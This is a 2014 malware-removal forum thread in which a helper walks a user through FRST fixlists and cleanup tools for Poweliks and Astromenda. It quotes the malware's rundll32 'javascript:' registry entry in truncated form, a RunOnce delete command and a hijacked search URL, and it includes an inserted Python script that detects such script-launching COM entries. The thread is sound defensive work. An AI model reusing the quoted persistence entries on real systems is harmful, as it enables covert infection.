Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: CF1A9122)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=499.9 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=1363 GB) - (Type=07 NTFS)

==================== End Of Log ============================

 



#4 rods

rods
  • Topic Starter

  • Members
  • 32 posts

Posted 17 October 2014 - 05:34 PM

I just realized I should probably attach the files. Sorry about that.




#5 Rootk

Rootk

  • Malware Response Team
  • 234 posts

Posted 18 October 2014 - 08:02 AM

Please follow these steps:
 
1.- Open Notepad. Please copy the contents of the code box below.

To do this, highlight the contents of the box and right-click on it. Paste this into the open Notepad.
Save it to your Desktop as fixlist.txt
 
HKLM-x32\...\RunOnce: [DelTr2236071] => cmd.exe /c rd /s /q "C:\Users\Rod\AppData\Roaming\WSE_Astromenda"
C:\Users\Rod\AppData\Roaming\WSE_Astromenda
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\RunOnce: [WSE_Astromenda] => [X]
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\RunOnce: [DelTr2236071] => cmd.exe /c rd /s /q "C:\Users\Rod\AppData\Roaming\WSE_Astromenda"
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x3CC8C2417B23CF01
SearchScopes: HKLM - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
SearchScopes: HKCU - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
CHR StartupUrls: Default -> "hxxp://www.google.com/", "hxxp://www.yahoo.com/", "hxxp://astromenda.com/?f=7&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir="
C:\Users\Rod\AppData\Roaming\1H1Q1V1N1N1O2V
2014-10-17 11:54 - 2014-09-01 10:15 - 00002896 _____ () C:\Windows\System32\Tasks\AutoKMS
CustomCLSID: HKU\S-1-5-21-153314184-682568810-1827683989-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
C:\Windows\AutoKMS\AutoKMS.exe
NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system


Run FRST and press the Fix button just once and wait.
The tool will make a log on your desktop (Fixlog.txt); please post it in your reply.

2.- Download AdwCleaner by Xplode onto your Desktop.
  • Double click on Adwcleaner.exe to run the tool.
  • Click on Scan
  • Once the scan is done, click on the Clean button.
  • You will get a prompt asking to close all programs. Click OK.
  • Click OK again to reboot your computer.
  • A text file will open after the restart. Please post the content of that logfile in your reply.
  • You can also find the logfile at C:\AdwCleaner[Sn].txt ('n' represents the number of the most recent report).
3.- Please download RogueKiller and save it to the desktop.
  • Close all windows and browsers
  • Double click on RogueKiller.exe to run the tool.
  • Press the scan button.
  • Once the scan is done, click on Report.
  • A log file will open, please copy/paste the content of that file into your next reply.
4.- Run FRST again, check Addition.txt, press Scan and attach both reports.
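
The correlation visible in the logs quoted in this thread, as an added example that is not part of any post here and is not FRST's own code: the CLSID whose localserver32 value launches rundll32.exe with a javascript: URL is the same CLSID named in a DCOM 10010 error, alongside the repeated dllhost.exe crashes in an unknown module. Function names and report keys are assumptions of this example; the sample lines are excerpted from the logs on this page, with the encoded script value trimmed.

```python
import re

# Lines excerpted from the FRST logs quoted in this thread. The rundll32 value
# is trimmed after RunHTMLApplication ("..." marks the cut).
SAMPLE_LOG = r"""
CustomCLSID: HKU\S-1-5-21-153314184-682568810-1827683989-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";... <==== Poweliks?
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
Error: (10/17/2014 11:54:34 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/17/2014 11:52:25 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {1EF75F33-893B-4E8F-9655-C3D602BA4897}

Error: (10/17/2014 11:49:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000

Error: (10/17/2014 11:43:42 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
"""

GUID = r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}"
# A COM server registration whose command line is rundll32 given a javascript: URL.
HIJACK_RE = re.compile(r"CLSID\\(" + GUID + r")\\(?:localserver32|inprocserver32)"
                       r"\s*(?:->|:)\s*(rundll32(?:\.exe)?\s+javascript:.*)", re.I)
EVENT_RE = re.compile(r"^Error: \((.+?)\) \(Source: (.+?)\) \(EventID: (\d+)\)")

def find_script_com_servers(text):
    """Map CLSID (upper-cased) -> command for rundll32/mshtml script launchers."""
    hits = {}
    for line in text.splitlines():
        m = HIJACK_RE.search(line)
        if m and "runhtmlapplication" in m.group(2).lower():
            hits[m.group(1).upper()] = m.group(2)
    return hits

def parse_events(text):
    """Return (timestamp, source, event_id, body) per 'Error:' block; a blank line ends it."""
    events, current = [], None
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if m:
            current = [m.group(1), m.group(2), int(m.group(3)), []]
            events.append(current)
        elif current is not None and line.strip():
            current[3].append(line)
        else:
            current = None
    return [(ts, src, eid, "\n".join(body)) for ts, src, eid, body in events]

def triage(text):
    hijacked = find_script_com_servers(text)
    report = {"hijacked_clsids": sorted(hijacked), "dcom_10010_hits": [], "dllhost_crashes": 0}
    for ts, src, eid, body in parse_events(text):
        low = body.lower()
        if src == "DCOM" and eid == 10010:
            # 10010: the COM server for this CLSID did not register within the timeout.
            report["dcom_10010_hits"] += [(ts, g.upper()) for g in re.findall(GUID, body)
                                          if g.upper() in hijacked]
        elif eid == 1000 and "dllhost.exe" in low and "faulting module name: unknown" in low:
            report["dllhost_crashes"] += 1
    return report

if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```

The second DCOM entry in the sample names a CLSID with no script-launching registration, so it is not reported.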

#6 rods

rods
  • Topic Starter

  • Members
  • 32 posts

Posted 18 October 2014 - 11:46 AM

Hello,

I attached the log files from FRST using the Fix button, AdwCleaner, RogueKiller, and finally from FRST scan again.

My computer has been connected for about an hour and I don't see multiple dllhost.exe 32 processes anymore.

 

Thanks.  Let me know what you see from the logs.

 

 




#7 Rootk

Rootk

  • Malware Response Team
  • 234 posts

Posted 18 October 2014 - 06:31 PM

Do you recognize this file?

C:\Users\Rod\Desktop\backup.bat

If not, please delete it.

Now, follow these steps:

1.- Open Notepad. Please copy the contents of the code box below.
To do this, highlight the contents of the box and right-click on it. Paste this into the open Notepad.
Save it to your Desktop as fixlist.txt
 
Firefox Packages (HKCU\...\Firefox Packages) (Version:  - ) <==== ATTENTION
Task: {64A516D5-ED53-486F-92C3-8DD020353915} - \AutoKMS No Task File <==== ATTENTION
EmptyTemp:
NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system


Run FRST64 and press the Fix button just once and wait.
The tool will make a log on your desktop (Fixlog.txt); please post it in your reply.

2.- Run Malwarebytes Anti-Malware and do the following:

Click on Scan now.
If an update is available, click Update Now.
A Threat Scan will start.
After scan, if potential threats are detected, ensure that Quarantine is selected as the Action for all the listed items, and click the Apply Actions button.

A window with an option to view the detailed log will appear. Click on View Detailed Log.
After viewing the results, please click on the Copy to Clipboard button > OK.
Paste your log into your next reply.

Note: If you lose the Clipboard copy and need to retrieve the log again, it can be found by opening Malwarebytes and clicking on History > Application Logs with the date of the scan. Simply double-click on that in order to see the options for Copying to Clipboard or to Export to a .txt file (Notepad), etc. The .txt file can be saved and posted when you are ready.

3.- Download Malwarebytes Anti-Rootkit from this link http://www.malwarebytes.org/products/mbar/
  • Unzip the File to a convenient location. (Recommend the Desktop)
  • You may receive a User Account Control prompt asking if you are sure you wish to allow the program to run. Please allow the program to run and MBAR will now start to install any necessary drivers that are required for the program to operate correctly. If a rootkit is interfering with the installation of the drivers you will see a message that states that the DDA driver was not installed and that you should reboot your computer to install it. You will see this image:

    mbarwm.png
  • If you receive this message, please click on the Yes button and Malwarebytes Anti-Rootkit will now restart your computer. Once the computer is rebooted and you login, MBAR will automatically start and you will now be at the start screen. (If no Rootkit warning you will go from step 4 to 6.)
  • The following image opens, select Next.

    Image2.png
  • The following image opens, select Update

    Image3.png
  • When the Update completes, select Next

    Image4.png
  • In the following window ensure "Targets" are ticked. Then select "Scan"

    Image5.png
  • If an infection/s is found the "Cleanup Button" to remove threats will be available. A list of infected files will be listed like the following example:

    MBAntiRKclean.png
  • Do not select the "Clean up Button"; select the "Exit" button. There will be a warning as follows:

    MBAntiRKclean1.png
  • Select "Yes" to close down the program. If NO infections were found you will see the following image:

    Image6.png
  • Select "Exit" to close down.
  • Copy and paste the two following logs from the mbar folder:

    System - log
    Mbar - log Date and time of scan will also be shown

    Post those two logs in your reply.




